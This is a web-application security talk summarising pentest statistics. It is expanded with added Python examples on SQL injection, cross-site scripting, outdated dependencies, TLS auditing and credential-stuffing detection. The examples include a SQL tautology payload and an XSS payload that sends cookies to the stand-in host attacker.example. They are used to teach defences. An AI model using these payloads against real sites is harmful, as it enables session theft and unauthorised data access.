A snapshot into current Web Application vulnerabilities
Willem Mouton willemm@senseofsecurity.com.au @w_m__
Introduction: Willem

Why we like numbers (and WebApps)
Unpacking the numbers
Digging a bit deeper
Dealing with the root cause
Closing thoughts
Q&A

Why we like numbers (and WebApps)
Improves our internal processes and quality
Provides (somewhat of) a measurement against industry
Helps answer some of your most burning questions
Unpacking the numbers
Data collected from 175 reports reviewed*
3670 findings analysed**
Average of 21 findings per report
Roughly 40% of our projects
Unpacking the numbers: Sense of Security Risk Matrix

Unpacking the numbers: Top 10 issues identified in 2018 (irrespective of risk level)
We'll get back to these

Unpacking the numbers: SOS Top 10 categories vs OWASP Top 10 (and why they differ on paper)

Unpacking the numbers: Large vs Small (on average across all reports)

Unpacking the numbers: Private sector vs Government (on average across all reports)
Digging deeper
Data validation remains a massive problem

SQL Injection
11% of all applications tested had at least one instance
20-year-old technique
Fully industrialised attacks
Widely used in breaches
Noisy, but low detection rate
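The point the slide makes about data validation is that concatenating input into the query text lets the attacker change the query's structure. The following is an added example (not code from the presentation) that shows the classic bug next to the parameterised fix, using Python's built-in sqlite3 driver and a constructed three-row user table; the table, the user names and the payload are all made up for the demonstration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user table for the demonstration (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("alice", "hash-a"), ("bob", "hash-b"), ("carol", "hash-c")],
    )
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    # The 20-year-old mistake: untrusted input becomes part of the SQL text,
    # so a quote in the input rewrites the WHERE clause.
    query = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    # Parameterised query: the value travels separately from the statement,
    # so it can only ever be compared as data, never parsed as SQL.
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    ).fetchall()


# Tautology payload: turns "username = ''" into "username = '' OR '1'='1'".
PAYLOAD = "' OR '1'='1"


def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable": find_user_vulnerable(conn, PAYLOAD),  # every row leaks
        "safe": find_user_safe(conn, PAYLOAD),              # no user has that name
        "normal": find_user_safe(conn, "alice"),            # legitimate lookup still works
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:10s} -> {rows}")
```

Validation of the input (length, character set) is worth adding as defence in depth, but it is the parameterisation that closes the hole; the detection-rate remark on the slide follows from the fact that the vulnerable query above is syntactically valid SQL and produces no error for the database to log.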
Digging deeper
Data validation remains a massive problem

Cross-Site Scripting
31% of all applications tested had at least one instance
More complicated, but can be more damaging
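Cross-site scripting is "more complicated" than SQL injection mainly because the correct encoding depends on where in the page the data lands. The block below is an added example, not from the presentation, showing a constructed stored-comment payload rendered unencoded and then encoded for the three most common contexts (HTML body, quoted attribute, JavaScript string) using only the Python standard library; the payload, the hostname attacker.example and the markup are assumptions made for the illustration.

```python
import html
import json

# Constructed stored-XSS payload (sample input, not taken from any real application).
COMMENT = '<script>location="https://attacker.example/?c="+document.cookie</script>'
# Constructed attribute-breakout payload.
ATTR_PAYLOAD = '" onfocus="alert(1)" autofocus="'


def render_vulnerable(comment: str) -> str:
    # Untrusted data dropped straight into the HTML body: the browser runs the script.
    return f'<p class="comment">{comment}</p>'


def render_body_safe(comment: str) -> str:
    # HTML body context: entity-encode & < > " ' so the data cannot start a tag.
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_attr_safe(value: str) -> str:
    # Attribute context: the attribute must be quoted AND the quotes in the data encoded,
    # otherwise the value can close the attribute and add new event handlers.
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def render_js_safe(value: str) -> str:
    # JavaScript string context: JSON-encode, then neutralise "</" so the data can
    # never terminate the enclosing <script> element early.
    encoded = json.dumps(value).replace("</", "<\\/")
    return f"<script>var comment = {encoded};</script>"


if __name__ == "__main__":
    print(render_vulnerable(COMMENT))
    print(render_body_safe(COMMENT))
    print(render_attr_safe(ATTR_PAYLOAD))
    print(render_js_safe(COMMENT))
```

In a real application this encoding lives in the template engine (auto-escaping), and a Content-Security-Policy header limits what an injected script could do if one slips through; neither replaces the other.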
Digging deeper
The forgotten software stack

Components with known vulnerabilities
31% of all applications tested had outdated components
Mostly ignored
Reliance on third-party CDN-hosted components
Poor internal management of code dependencies
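"Poor internal management of code dependencies" usually comes down to nobody comparing what is pinned against what is known to be vulnerable. As an added example (not from the presentation), the block below parses a constructed requirements-style pin list and checks it against a constructed advisory table; the package names examplelib, widgetkit and othertool and their versions are fictional and stand in for a real advisory feed, which a tool such as pip-audit or OWASP Dependency-Check would supply.

```python
import re

# Constructed advisory table: fictional packages, fictional fixed versions.
ADVISORIES = {
    "examplelib": {"fixed_in": "2.4.1", "note": "constructed example advisory"},
    "widgetkit": {"fixed_in": "1.0.9", "note": "constructed example advisory"},
}

# Constructed pin list in requirements.txt style.
REQUIREMENTS = """\
examplelib==2.3.0
widgetkit==1.1.0
# comment line, ignored
othertool==5.0.0
"""

# name==version, numeric dotted versions only (assumption for this example).
PIN_RE = re.compile(r"^\s*([A-Za-z0-9_.-]+)\s*==\s*([0-9][0-9.]*)\s*$")


def parse_version(v: str) -> tuple:
    # Tuple comparison gives correct ordering for plain dotted numeric versions.
    return tuple(int(part) for part in v.split("."))


def parse_pins(text: str) -> dict:
    pins = {}
    for line in text.splitlines():
        m = PIN_RE.match(line)
        if m:
            pins[m.group(1).lower()] = m.group(2)
    return pins


def outdated(pins: dict, advisories: dict) -> list:
    """Return (name, pinned, fixed_in) for every pin older than the fixed version."""
    hits = []
    for name, version in pins.items():
        adv = advisories.get(name)
        if adv and parse_version(version) < parse_version(adv["fixed_in"]):
            hits.append((name, version, adv["fixed_in"]))
    return sorted(hits)


def demo() -> list:
    return outdated(parse_pins(REQUIREMENTS), ADVISORIES)


if __name__ == "__main__":
    for name, pinned, fixed in demo():
        print(f"{name} {pinned} is below fixed version {fixed}")
```

The same check belongs in the build pipeline for front-end bundles and for anything loaded from a CDN; a script tag pointing at a CDN is still a dependency, and Subresource Integrity at least pins the bytes you reviewed.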
Digging deeper
88% of all applications tested had SSL/TLS issues
Certificate issues
Protocol issues
Cipher / configuration issues
Known attacks
Standardisation lacking
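The four buckets on the slide (certificate, protocol, cipher/configuration, known attacks) can be turned into a policy that is checked automatically, which is what "standardisation" means in practice. The block below is an added example, not from the presentation: it audits a constructed scan summary against such a policy and builds a client-side ssl.SSLContext that refuses anything below TLS 1.2. The scan dictionary shape, the hostname www.example.com and the cipher names are assumptions made for the demonstration, not the output format of any particular scanner.

```python
import ssl
from datetime import datetime, timezone

WEAK_PROTOCOLS = {"SSLv2", "SSLv3", "TLSv1.0", "TLSv1.1"}
# Substrings that mark ciphers the policy rejects (assumption: OpenSSL-style names).
WEAK_CIPHER_MARKERS = ("RC4", "DES", "NULL", "EXPORT", "anon", "MD5")

# Constructed scan summary for one host (not real scanner output).
SAMPLE_SCAN = {
    "hostname": "www.example.com",
    "certificate": {
        "not_after": datetime(2019, 1, 1, tzinfo=timezone.utc),
        "subject_alt_names": ["example.com"],
        "self_signed": False,
    },
    "protocols": ["TLSv1.0", "TLSv1.2"],
    "ciphers": ["ECDHE-RSA-AES128-GCM-SHA256", "DES-CBC3-SHA", "RC4-SHA"],
}


def audit_tls(scan: dict, now: datetime) -> list:
    """Return one finding string per policy violation in the scan summary."""
    findings = []
    cert = scan["certificate"]
    if cert["not_after"] < now:
        findings.append("certificate: expired")
    if scan["hostname"] not in cert["subject_alt_names"]:
        findings.append("certificate: hostname not in SAN")
    if cert["self_signed"]:
        findings.append("certificate: self-signed")
    for proto in scan["protocols"]:
        if proto in WEAK_PROTOCOLS:
            findings.append(f"protocol: {proto} enabled")
    for cipher in scan["ciphers"]:
        if any(marker in cipher for marker in WEAK_CIPHER_MARKERS):
            findings.append(f"cipher: {cipher}")
    return findings


def hardened_client_context() -> ssl.SSLContext:
    # create_default_context already verifies the chain and hostname;
    # the minimum version is raised so TLS 1.0/1.1 servers are refused outright.
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def demo() -> list:
    return audit_tls(SAMPLE_SCAN, datetime(2024, 6, 1, tzinfo=timezone.utc))


def context_is_hardened() -> bool:
    ctx = hardened_client_context()
    return (
        ctx.minimum_version == ssl.TLSVersion.TLSv1_2
        and ctx.check_hostname
        and ctx.verify_mode == ssl.CERT_REQUIRED
    )


if __name__ == "__main__":
    for finding in demo():
        print(finding)
    print("client context hardened:", context_is_hardened())
```

The "known attacks" bucket (padding-oracle and downgrade style issues) is mostly eliminated by the same two controls: drop the legacy protocols and the CBC/RC4/3DES cipher families the policy above rejects.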
Digging deeper
Some honourable mentions
XML external entity (XXE) vulnerabilities
Serialisation issues
Server-side request forgery (SSRF)
Root cause
Configuration
Design
Implementation
A quick segue
Consider the ecosystem your web application lives in
Most common attack actively being used: credential stuffing
Known breaches (don't be in one of them)
#ShamelessPromotions: our whitepaper on External Network Pentesting
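Credential stuffing replays username/password pairs from other sites' breaches, so the signature in your own logs is one source trying many different accounts, mostly failing, with the occasional success marking an account that was reused. The following is an added detection example, not from the presentation, run over a constructed authentication log; the log format (timestamp, source IP, username, result), the RFC 5737 documentation addresses and the thresholds are assumptions made for the illustration.

```python
from collections import defaultdict

# Constructed authentication log: "timestamp source_ip username result" (not real data).
AUTH_LOG = """\
2019-03-01T10:00:01Z 203.0.113.7 alice FAIL
2019-03-01T10:00:02Z 203.0.113.7 bob FAIL
2019-03-01T10:00:02Z 203.0.113.7 carol FAIL
2019-03-01T10:00:03Z 203.0.113.7 dave FAIL
2019-03-01T10:00:03Z 203.0.113.7 erin FAIL
2019-03-01T10:00:04Z 203.0.113.7 frank OK
2019-03-01T10:05:00Z 198.51.100.4 alice FAIL
2019-03-01T10:05:20Z 198.51.100.4 alice FAIL
2019-03-01T10:05:40Z 198.51.100.4 alice OK
"""


def parse_log(text: str):
    for line in text.splitlines():
        if not line.strip():
            continue
        _ts, ip, user, result = line.split()
        yield ip, user, result


def detect_credential_stuffing(text: str, min_distinct_users: int = 5,
                               min_fail_ratio: float = 0.5) -> dict:
    """Flag sources that tried many distinct usernames with a high failure rate.

    A single user failing repeatedly (198.51.100.4 above) is brute force or a
    forgotten password, not stuffing, so it is deliberately not flagged.
    """
    per_ip = defaultdict(lambda: {"users": set(), "failures": 0, "total": 0,
                                  "successes": set()})
    for ip, user, result in parse_log(text):
        entry = per_ip[ip]
        entry["users"].add(user)
        entry["total"] += 1
        if result == "FAIL":
            entry["failures"] += 1
        else:
            entry["successes"].add(user)

    flagged = {}
    for ip, entry in per_ip.items():
        fail_ratio = entry["failures"] / entry["total"]
        if len(entry["users"]) >= min_distinct_users and fail_ratio >= min_fail_ratio:
            flagged[ip] = {
                "distinct_users": len(entry["users"]),
                "failures": entry["failures"],
                "total": entry["total"],
                # Accounts that succeeded from a stuffing source need a forced reset.
                "successes": sorted(entry["successes"]),
            }
    return flagged


if __name__ == "__main__":
    for ip, summary in detect_credential_stuffing(AUTH_LOG).items():
        print(ip, summary)
```

Attackers spread stuffing across many source addresses, so in production the same aggregation is also done per username across sources and per time window; the counter-measures that do not depend on detection are multi-factor authentication and checking new passwords against known-breach lists.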
Closing thoughts
Changing next year's report
Security from design to … to BAU
Consider all vulnerabilities
Create development / deployment standards for your organisation
Automation is key, but don't forget the manual work
Use industry guidelines; OWASP ASVS is great
Training
Questions?